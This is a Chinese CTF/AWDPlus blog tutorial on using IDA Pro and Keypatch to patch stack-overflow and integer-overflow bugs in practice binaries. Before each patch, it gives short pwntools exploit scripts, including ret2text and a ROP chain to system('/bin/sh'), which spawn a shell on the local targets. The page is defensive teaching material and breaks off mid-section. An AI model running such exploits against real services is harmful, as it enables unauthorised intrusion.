<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="wutong">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    
    
    <!--- Seo Part-->
    
    <link rel="canonical" href="https://wutong01304.github.io/2023/07/25/fix/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
        <meta name="description" content="AWDPlus是一种网络攻防竞赛规则，它源自AWD比赛并加以改进。AWDPlus比赛由多个队伍组成，每个队伍有自己的攻击和防御能力，比赛中将进行攻防双方的对抗。与传统CTF不同的是，AWDPlus有防御环节：赛队识别出靶机环境中存在的漏洞时，需要对其进行修补，使得靶机环境无法被平台方攻破。 一、栈溢出修补1.1 工具准备Keypatch 为IDA Pro的一个插件，可以用来修改ARM指令，这使得它">
<meta property="og:type" content="article">
<meta property="og:title" content="IDA修补简单漏洞">
<meta property="og:url" content="https://wutong01304.github.io/2023/07/25/fix/index.html">
<meta property="og:site_name" content="wutong">
<meta property="og:description" content="AWDPlus是一种网络攻防竞赛规则，它源自AWD比赛并加以改进。AWDPlus比赛由多个队伍组成，每个队伍有自己的攻击和防御能力，比赛中将进行攻防双方的对抗。与传统CTF不同的是，AWDPlus有防御环节：赛队识别出靶机环境中存在的漏洞时，需要对其进行修补，使得靶机环境无法被平台方攻破。 一、栈溢出修补1.1 工具准备Keypatch 为IDA Pro的一个插件，可以用来修改ARM指令，这使得它">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/ida1.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/ida2.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/ida5.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/ida3.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/ida4.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix1.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix2.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix3.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix4.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix5.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix6.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix7.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix8.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix9.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix10.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix12.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix13.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix14.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix11.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix17.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix15.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/a2.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/a6.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/a1.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/a3.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/a4.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/a5.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/a7.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/a8.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/a9.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/a10.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/a11.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix16.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/f3.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/f1.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/f4.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/f5.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/f6.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/f7.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/f8.png?x-oss-process=style/watermark">
<meta property="og:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/f2.png?x-oss-process=style/watermark">
<meta property="article:published_time" content="2023-07-25T11:45:14.000Z">
<meta property="article:modified_time" content="2023-08-20T11:40:44.219Z">
<meta property="article:author" content="wutong">
<meta property="article:tag" content="Pwn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/ida1.png?x-oss-process=style/watermark">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/my-logo-favicon.jpg" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/my-logo-favicon.jpg">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/my-logo-favicon.jpg">
    <!--- Page Info-->
    
    <title>
        
            IDA修补简单漏洞 -
        
        wutong
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
<link rel="stylesheet" href="/fonts/fonts.css">

    
<link rel="stylesheet" href="/fonts/Satoshi/satoshi.css">

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">

    <!--- Font Part-->
    
    
    
    

    <!--- Inject Part-->
    
    <script id="hexo-configurations">
    let Global = window.Global || {};
    Global.hexo_config = {"hostname":"wutong01304.github.io","root":"/","language":"en"};
    Global.theme_config = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true},"word_count":{"enable":false,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":2,"number":false,"expand":true,"init_open":true},"copyright":true,"lazyload":true,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"busuanzi_counter":{"enable":false,"site_pv":false,"site_uv":false,"post_pv":false},"pjax":true,"open_graph":true,"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"static","image":{"light":"/images/wallhaven-wqery6-light.webp","dark":"/images/wallhaven-wqery6-dark.webp"},"title":"梧桐","subtitle":{"text":["梧桐生矣，于彼朝阳"],"hitokoto":{"enable":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":false,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":false,"links":{"github":null,"instagram":null,"zhihu":null,"twitter":null,"email":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.2.1","navbar":{"auto_hide":false,"tags":{"Tags":{"icon":"fa-solid fa-tags","path":"/tags/"}},"categories":{"Categories":{"icon":"fa-solid fa-folder","path":"/categories/"}},"color":{"left":"#f78736","right":"#367df7","transparency":35},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"},"Github":{"path":"https://github.com/wutong01304","icon":"github"}},"search":{"enable":false,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"cloud"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"links":null},"article_date_format":"auto","categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2023/7/1 11:45:14"};
    Global.language_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    Global.data_config = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
        <span class="pjax-progress-icon">
            <i class="fa-solid fa-circle-notch fa-spin"></i>
        </span>
    
</div>


<main class="page-container">

    

    <div class="main-content-container">

        <div class="main-content-header">
            <header class="navbar-container">
    
    <div class="navbar-content">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                wutong
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="" 
                                    href="/"  >
                                    
                                        
                                            <i class="fa-regular fa-house"></i>
                                        
                                        HOME
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                        
                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="" 
                                    target="_blank" rel="noopener" href="https://github.com/wutong01304"  >
                                    
                                        
                                            <i class="github"></i>
                                        
                                        GITHUB
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile drawer -->
    <div class="navbar-drawer">
        <ul class="drawer-navbar-list">
            
                
                    <li class="drawer-navbar-item flex-center">
                        <a class="" 
                        href="/"  >
                             
                                
                                    <i class="fa-regular fa-house"></i>
                                
                                HOME
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            
                
                    <li class="drawer-navbar-item flex-center">
                        <a class="" 
                        target="_blank" rel="noopener" href="https://github.com/wutong01304"  >
                             
                                
                                    <i class="github"></i>
                                
                                GITHUB
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            

        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="main-content-body">

            

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="post-page-container">
        <div class="article-content-container">

            
             
                <div class="article-title">         
                    <img src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fixcover.jpg" alt="IDA修补简单漏洞" />
                    <h1 class="article-title-cover">IDA修补简单漏洞</h1>
                </div>
            
                
            

            
                <div class="article-header">
                    <div class="avatar">
                        <img src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/my-logo-avatar.jpg">
                    </div>
                    <div class="info">
                        <div class="author">
                            <span class="name">wutong</span>
                            
                                <span class="author-label">Lv3</span>
                            
                        </div>
                        <div class="meta-info">
                            <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2023-07-25 19:45:14</span>
        <span class="mobile">2023-07-25 19:45</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2023-08-20 19:40:44</span>
            <span class="mobile">2023-08-20 19:40</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
        <span class="article-categories article-meta-item">
            <i class="fa-regular fa-folders"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/categories/Study/">Study</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/Pwn/">Pwn</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
</div>

                        </div>
                    </div>
                </div>
            

            <div class="article-content markdown-body">
                <p>AWDPlus是一种网络攻防竞赛规则，它源自AWD比赛并加以改进。AWDPlus比赛由多个队伍组成，每个队伍有自己的攻击和防御能力，比赛中将进行攻防双方的对抗。与传统CTF不同的是，AWDPlus有防御环节：赛队识别出靶机环境中存在的漏洞时，需要对其进行修补，使得靶机环境无法被平台方攻破。</p>
<h1 id="一、栈溢出修补"><a href="#一、栈溢出修补" class="headerlink" title="一、栈溢出修补"></a>一、栈溢出修补</h1><h2 id="1-1-工具准备"><a href="#1-1-工具准备" class="headerlink" title="1.1 工具准备"></a>1.1 工具准备</h2><p>Keypatch 为IDA Pro的一个插件，可以用来修改ARM指令，这使得它非常适合用于二进制文件的修改。我们可以利用KeyPatch来修改函数的行为，比如改变跳转指令、修改寄存器值等。下载链接：<a class="link"   target="_blank" rel="noopener" href="https://github.com/keystone-engine/keypatch" >https://github.com/keystone-engine/keypatch <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a> ，下载好脚本后放到ida目录中的&#x2F;plugins目录即可。（keypatch对IDA有版本要求，最好7.0以上）</p>
<p>然后还需要安装一些依赖：</p>
<div class="highlight-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">pip3 install keystone-engine</span><br><span class="line">pip3 install six</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/ida1.png?x-oss-process=style/watermark"
                     
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/ida2.png?x-oss-process=style/watermark"
                     
                ></p>
<p>可以看IDA下面的交互界面，如果提示缺了哪些包，安装即可：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/ida5.png?x-oss-process=style/watermark"
                     
                ></p>
<p>下载之后如果IDA依旧提示缺少依赖，可以将包复制到IDA的python里面：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/ida3.png?x-oss-process=style/watermark"
                     
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/ida4.png?x-oss-process=style/watermark"
                     
                ></p>
<h2 id="1-2-字节未限制导致的简单漏洞"><a href="#1-2-字节未限制导致的简单漏洞" class="headerlink" title="1.2 字节未限制导致的简单漏洞"></a>1.2 字节未限制导致的简单漏洞</h2><p>比如最常见的read函数的溢出漏洞：read读取的字节超过栈字节，就造成了溢出。修补也就是对其读取字节进行限制。</p>
<p>如下文件，文件链接：<a class="link"   target="_blank" rel="noopener" href="https://wutongblogs.oss-cn-beijing.aliyuncs.com/test/fix/pwn" >https://wutongblogs.oss-cn-beijing.aliyuncs.com/test/fix/pwn <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<h3 id="1-2-1-攻击"><a href="#1-2-1-攻击" class="headerlink" title="1.2.1 攻击"></a>1.2.1 攻击</h3><p>反汇编发现溢出漏洞：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix1.png?x-oss-process=style/watermark"
                     
                ></p>
<p>栈大小只有0x50字节，read函数却有0x100字节，还有后门存在：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix2.png?x-oss-process=style/watermark"
                     
                ></p>
<p>攻击脚本：</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=process(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">back_addr=<span class="number">0x0400677</span></span><br><span class="line">context.log_level=<span class="string">&quot;debug&quot;</span></span><br><span class="line">p.recvuntil(<span class="string">&quot;find it?&quot;</span>)</span><br><span class="line">payload =<span class="string">&#x27;a&#x27;</span>*<span class="number">0x58</span>+p64(back_addr)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></div>

<p>此时可以攻击成功：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix3.png?x-oss-process=style/watermark"
                     
                ></p>
<h3 id="1-2-2-修补"><a href="#1-2-2-修补" class="headerlink" title="1.2.2 修补"></a>1.2.2 修补</h3><p>这类漏洞修补就很简单，只需要把read读取的字节修改为 0x50 即可。</p>
<p>找到汇编代码部分，按 <code>Ctrl+alt+K</code> ，弹出KeyPatch：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix4.png?x-oss-process=style/watermark"
                     
                ></p>
<p>将 <code>mov edx, 100h</code> 修改为 <code>mov edx, 50</code>：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix5.png?x-oss-process=style/watermark"
                     
                ></p>
<p>修改后的汇编：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix6.png?x-oss-process=style/watermark"
                     
                ></p>
<p>按 <code>F5</code> 刷新伪代码，已经成功修改了：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix7.png?x-oss-process=style/watermark"
                     
                ></p>
<p>在 <code>Edit--&gt;Patch program--&gt;Apply patches to input file</code> 保存文件，再次执行攻击脚本攻击就不成功了：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix8.png?x-oss-process=style/watermark"
                     
                ></p>
<hr>
<h1 id="二、整数溢出修补"><a href="#二、整数溢出修补" class="headerlink" title="二、整数溢出修补"></a>二、整数溢出修补</h1><p>修补方法：</p>
<ol>
<li>把变量从有符号类型改成无符号类型（例如int改成unsigned int）</li>
<li>把跳转指令从有符号跳转指令改成无符号跳转指令（例如jle指令改成jbe指令）</li>
</ol>
<ul>
<li>jnz：不相等时跳转   jne：如果不等于，就跳转到目标地址</li>
<li>jz：相等时跳转    je：如果等于，就跳转到目标地址</li>
<li>jle：小于时跳转（有符号）jl：如果小于，就跳转到目标地址</li>
<li>jbe：小于时跳转（无符号）</li>
<li>jge：大于时跳转（有符号） jg：如果大于，就跳转到目标地址</li>
<li>jnb：大于时跳转（无符号）</li>
</ul>
<p> 如下文件：<a class="link"   target="_blank" rel="noopener" href="https://wutongblogs.oss-cn-beijing.aliyuncs.com/test/fix/ret2text_x64s" >https://wutongblogs.oss-cn-beijing.aliyuncs.com/test/fix/ret2text_x64s <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<h2 id="2-1-攻击"><a href="#2-1-攻击" class="headerlink" title="2.1 攻击"></a>2.1 攻击</h2><p>反汇编：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix9.png?x-oss-process=style/watermark"
                     
                ></p>
<p> <code>if</code>判断的时候是整型，但是  <code>read</code> 读取的时候，后面字节限制的无符号型，因此可以通过输入负数造成溢出：</p>
<p>攻击脚本：</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=process(<span class="string">&#x27;./ret2text_x64s&#x27;</span>)</span><br><span class="line">back_addr=<span class="number">0x400727</span></span><br><span class="line">context.log_level=<span class="string">&quot;debug&quot;</span></span><br><span class="line">p.recvuntil(<span class="string">&quot;of your name:\n&quot;</span>)</span><br><span class="line">p.sendline(<span class="string">&#x27;-1&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">&quot;u name?\n&quot;</span>)</span><br><span class="line">payload =<span class="string">&#x27;a&#x27;</span>*<span class="number">0x18</span>+p64(back_addr)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></div>

<p>成功获取shell：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix10.png?x-oss-process=style/watermark"
                     
                ></p>
<h2 id="2-2-修补"><a href="#2-2-修补" class="headerlink" title="2.2 修补"></a>2.2 修补</h2><p>将有符号跳转指令 <code>jle</code>修改为无符号跳转指令 <code>jbe</code>，按 <code>Ctrl+alt+K</code> ，弹出KeyPatch：I</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix12.png?x-oss-process=style/watermark"
                     
                ></p>
<p>修改：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix13.png?x-oss-process=style/watermark"
                     
                ></p>
<p>修改完之后刷新，成功将其修改：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix14.png?x-oss-process=style/watermark"
                     
                ></p>
<p>保存之后，使用攻击脚本，显示输入字符过长：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix11.png?x-oss-process=style/watermark"
                     
                ></p>
<hr>
<h1 id="三、栈溢出修补"><a href="#三、栈溢出修补" class="headerlink" title="三、栈溢出修补"></a>三、栈溢出修补</h1><p>除了1.2节介绍的简单栈溢出外，还有其它栈溢出，比如<code>Scanf</code>未限制字节长度，此时如何修补呢？如果新加一条判断长度的语句，在编写代码过程中非常简单，但在汇编指令中，是很复杂的，因此我们选择将无字节限制的<code>Scanf</code>函数修改为有字节限制的<code>read</code>函数。</p>
<p>文件链接：<a class="link"   target="_blank" rel="noopener" href="https://wutongblogs.oss-cn-beijing.aliyuncs.com/test/fix/ROP_x64" >https://wutongblogs.oss-cn-beijing.aliyuncs.com/test/fix/ROP_x64 <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<h2 id="3-1-攻击"><a href="#3-1-攻击" class="headerlink" title="3.1 攻击"></a>3.1 攻击</h2><p>反汇编：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix17.png?x-oss-process=style/watermark"
                     
                ></p>
<p><code>Scanf</code>未限制输入，导致溢出</p>
<p>攻击脚本：</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p=process(<span class="string">&#x27;./ROP_x64&#x27;</span>)</span><br><span class="line">sys_addr=<span class="number">0x0400490</span> </span><br><span class="line">binsh=<span class="number">0x04006D4</span></span><br><span class="line">rdi_ret=<span class="number">0x04006b3</span></span><br><span class="line">ret=<span class="number">0x0400479</span> </span><br><span class="line">context.log_level=<span class="string">&quot;debug&quot;</span></span><br><span class="line">p.recvuntil(<span class="string">&quot;shell?\n&quot;</span>)</span><br><span class="line">payload =<span class="string">&#x27;a&#x27;</span>*<span class="number">0x28</span>+p64(rdi_ret)+p64(binsh)+p64(ret)+p64(sys_addr)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></div>

<p>成功获取shell：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/fix15.png?x-oss-process=style/watermark"
                     
                ></p>
<h2 id="3-2-防御"><a href="#3-2-防御" class="headerlink" title="3.2 防御"></a>3.2 防御</h2><h3 id="3-2-1-原理"><a href="#3-2-1-原理" class="headerlink" title="3.2.1 原理"></a>3.2.1 原理</h3><p>将无字节限制的<code>Scanf</code>函数修改为有字节限制的<code>read</code>函数：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://wutongblogs.oss-cn-beijing.aliyuncs.com/blogs/fix/a2.png?x-oss-process=style/watermark"
                     
                ></p>
<p><code>read</code>函数有三个参数，分别在<code>rdi</code>、<code>rsi</code>、<code>rdx</code>中，要想达到输入字符且限制长度的目的，三个参数应该分别为<code>0,v1_addr,0x20</code>。参数我们可以通过<code>mov</code>指令来实现，那么如何调用<code>read</code>函数呢？如果直接给出<code>read</code>函数地址，我们就可以直接使用了，但是没有的话要怎么办呢？</p>
<p>这就要用到我们的系统调用功能了，我们知道64位里，系统调用是<code>syscall</code>，系统调用号储存在<code>rax</code>寄存器中，而<code>read</code>函数的系统调用号为0，因此我们需要构造如下汇编指令：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">rax=0</span><br><span class="line">rdi=0</span><br><span class="line">rsi=vi_addr</span><br><span class="line">rdx=0x20</span><br><span class="line">syscall //read(0,v1,0x20)</span><br></pre></td></tr></table></figure></div>

<p>但是这么多汇编指令的，添加到原有的文件里，就会修改它们的布局，造成程序无法运行，因此我们需要一个额外的数据段，来添加汇编指令。一般.eh_frame这个数据段是有可执行权限的，因此我们在这个数据段找一段空白的地方来修改汇编指令。</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
